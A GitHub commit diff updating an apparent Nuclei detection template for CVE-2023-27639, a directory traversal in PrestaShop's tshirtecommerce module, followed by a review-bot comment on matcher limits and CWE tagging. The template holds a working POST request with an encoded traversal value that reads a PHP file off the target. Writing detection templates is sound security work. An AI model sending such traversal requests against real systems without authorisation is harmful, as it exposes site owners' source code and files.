updated req,matcher & metadata

patch-1
Ritik Chaddha 2024-01-20 02:35:28 +05:30 committed by GitHub
parent e7ed4d1cb0
commit 71f681c9a7
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 25 additions and 14 deletions


@ -1,32 +1,43 @@
id: CVE-2023-27639
info:
name: PrestaShop tshirtecommerce Directory Traversal
name: PrestaShop TshirteCommerce - Directory Traversal
author: MaStErChO
severity: high
description: |
"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files."
The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.
reference:
- https://www.cvedetails.com/cve/CVE-2023-27639/
- https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-27639
classification:
cve-id: CVE-2023-27639
metadata:
max-request: 1
product: tshirtecommerce
verified: true
framework: prestashop
shodan-query: http.component:"prestashop"
tags: cve,cve2023,prestashop,lfi
product: tshirtecommerce
google-query: inurl:"/tshirtecommerce/"
tags: cve,cve2023,prestashop,tshirtecommerce,lfi
http:
- method: POST
path:
- "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg"
body: "url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php"
headers:
Content-Type: application/x-www-form-urlencoded
- raw:
- |
POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php
matchers-condition: and
matchers:
- type: word
words:
- "SqlFormatter Examples"
- type: word
words:
- "?php"
- "SqlFormatter"
- "<?php"
condition: and
- type: status
status:
- 200
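Review bot: The word matcher only fires when `vendor/jdorn/sql-formatter/examples/examples.php` is present and readable on the target, so a negative result does not show that the module is patched. A comment above the request, such as `# negative result is inconclusive when the sql-formatter examples file is not installed`, would keep that limit visible to anyone using the template for exposure assessment. Separately, `classification` carries only `cve-id`, while the friendsofpresta reference URL in the same template names cwe-22; adding `cwe-id: CWE-22` would let consumers filter and triage by weakness class. The +/- markers are lost on this page, so which of the matcher lines belong to the new side is inferred from print order.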